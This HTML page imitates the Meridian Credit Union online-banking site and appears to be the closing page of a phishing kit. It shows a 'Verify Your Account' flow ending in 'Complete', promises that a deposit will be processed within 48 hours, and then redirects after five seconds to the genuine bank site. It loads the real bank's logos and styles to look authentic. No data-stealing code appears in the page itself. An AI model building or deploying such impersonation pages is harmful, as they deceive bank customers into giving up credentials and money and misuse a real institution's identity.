

<!DOCTYPE html>
<html>
<head>
    
    <title>Complete - Meridian Credit Union</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <meta name="description" content="Meridian Credit Union online banking">
    <meta name="keywords" content="meridian, credit, union, online, banking">
    <meta http-equiv="refresh" content="900;url=/Security">
	
	<META HTTP-EQUIV="Refresh" CONTENT="5;URL=https://www.meridiancu.ca/">
	<base href="/">

	<link href="https://banking.meridiancu.ca//Content/css/style.css?v=OB.Retail.Release.6.7.1.19" rel="stylesheet" />
	<script src="https://banking.meridiancu.ca//Content/js/global.js?v=OB.Retail.Release.6.7.1.19"></script>



</head>
<body>

<div class="load-remove" style="display: none">


	
</div>
<div class="body-content">
	<div class="row public-header">
		<div class="logo-container">
			<a href="/Security_Login">
				<img src="https://banking.meridiancu.ca//Content/Images/meridian-logo.svg" alt="Meridian Logo" class="meridian-logo" />
			</a>
		</div>
		<div class="link-container">
			<ul class="utility-links">
				<li>
					<a href="https://www.meridiancu.ca/" target="_blank">MeridianCU.ca</a>
				</li>
			</ul>
		</div>
	</div>
</div>

	<div id="page-content" class="signin-page" style="background-image: url(https://banking.meridiancu.ca/Content/Images/Banners/Retail_SignInBackground_All.jpg)">


		<div class="signin-page-inner dimmed">
			<div class="row">
				<div class="signin-form-container wide">
					

<form action="/ForgotPassword_Setup" method="post"><input name="__RequestVerificationToken" type="hidden" value="Ey6DdmQayNZKIwyvXT6wMHdUSK7j_E8OH0FwHKfwudx2Ic1BC7qndfMZda_45RVtg6I2kc3oL_8Y_R0bXyqtJczCe5x7OUlRS-eYrpDfX4k1" />	<div class="signin-form">
		<h1>Verify Your Account</h1>



<div class="horizontal-steps">
	<div class="step ">
		<span>Security</span>
	</div>

	<div class="step ">
		<span>Verify account</span>
	</div>

	<div class="step selected">
		<span>Complete</span>
	</div>
</div>

</br>
</br>
</br>
			<p>Thank you.</p>
<p>Your deposit will be processed within 48 hours.</p>


		
	</div>
</form>

					<div class="signin-form-links">
						<a href="/Security_Contact" class="semibold ">Contact Us</a> |
						<a href="/Security_FAQ" class="semibold ">FAQs</a> |
						<a href="/Security_Difficulty" class="semibold ">Having Difficulty Signing In?</a>
					</div>
				</div>
			</div>
		</div>
	</div>

<footer class="main-footer">
	<div class="row">
		<div class="footer-logos">
			<div class="logo-container">
				<a href="/Security_Login">
					<img src="https://banking.meridiancu.ca//Content/Images/meridian-logo-white.svg" alt="Meridian Logo" class="meridian-logo" />
				</a>
			</div>
			<div>
				<img src="https://banking.meridiancu.ca//Content/Images/entrust.png" class="entrust-seal" />
			</div>
		</div>
		<div class="footer-sub">
			<span>Copyright &copy; 2019 Meridian Credit Union. All rights reserved.</span>
			<div class="footer-links">
				<a href="https://www.meridiancu.ca/privacy" title="Privacy & Security" target="_blank" >Privacy & Security</a>
				<a href="https://www.meridiancu.ca/legal" title="Legal" target="_blank" >Legal</a>
				<a href="https://www.meridiancu.ca/accessibility" title="Accessibility" target="_blank" >Accessibility</a>
			</div>
		</div>
	</div>
</footer>

	
</body>
</html>
